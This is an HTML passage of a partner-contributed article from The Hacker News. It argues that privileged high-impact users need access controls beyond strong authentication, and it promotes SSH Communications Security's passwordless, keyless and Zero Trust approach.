left;"><strong>Not all digital identities are created equal – superusers need super protection </strong></h2> <p>Think about this: Your typical user probably needs access to regular office tools, like your CRM or M365. They don't need access to any of your critical assets. </p> <p>The identity verification process should correspond to this. A regular user needs to be verified with strong authentication methods, e.g. Microsoft Entra ID, but there's usually no need to go beyond that.</p> <p>These typical users form the majority of your users, up to 99,5% of them.</p> <p>On the other hand, you have your privileged high-impact users – there's only a small number of them (typically around one in 200 users), but the power and risks they carry are huge because they can access your critical data, databases, infrastructures, and networks. </p> <p>Similarly, appropriate identity verification procedures should apply. In the case of your high-impact users, <a href="https://www.ssh.com/solutions/entra-id-and-privileged-access-management-with-zero-trust-suite" rel="nofollow" target="_blank">you need access controls that go beyond strong identity-based authentication.</a></p> <h2 style="text-align: left;"><strong>Enter the Zero Trust - Borderless, Passwordless, Keyless and Biometric Future</strong></h2> <p>Traditional solutions are not enough to bridge your PAM and IdM. They just can't handle the security that you need to protect your critical assets. Nor can they offer effective and future-proof security controls for access and identities of your typical users as well as high-impact users. </p> <p>The future of cybersecurity is borderless, passwordless, keyless, <a href="https://www.ssh.com/passwordless-identity-and-privileged-access-management" rel="nofollow" target="_blank">biometric</a>, and Zero Trust. </p> <p>This means that you need a future-proof cybersecurity model with no implicitly trusted users, connections, applications, servers, or devices. On top of that, you need an additional layer of security with passwordless, keyless, and biometric authentication.</p> <p>Learn the importance of implementing the <a href="https://info.ssh.com/passwordless-keyless-white-paper?_gl=1*1yy2av*_gcl_au*MTA0OTA1NjI1MS4xNzA3ODE3Nzc4*_ga*MTk4NjEwMzExMS4xNjkyMjYxNDgy*_ga_6VT6K5D8NH*MTcwODkzNjc4Ni4zOTMuMS4xNzA4OTM5MDM4LjM0LjAuMA.." rel="nofollow" target="_blank">passwordless and keyless</a> approach into your cybersecurity from the whitepaper provided by SSH Communications Security.</p> <br/> <div class="stophere" id="hiddenH1"></div> <div class="cf note-b">Found this article interesting? <span class="">This article is a contributed piece from one of our valued partners.</span> Follow us on <a href="https://twitter.com/thehackersnews" rel="nofollow" target="_blank">Twitter <i class="icon-font icon-twitter"></i></a> and <a href="https://www.linkedin.com/company/thehackernews/" rel="nofollow" target="_blank">LinkedIn</a> to read more exclusive content we post.</div> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/superusers-need-super-protection-how-to.html" rel="nofollow" target="_blank">thehackernews.com</a>Unknownnoreply@blogger.com0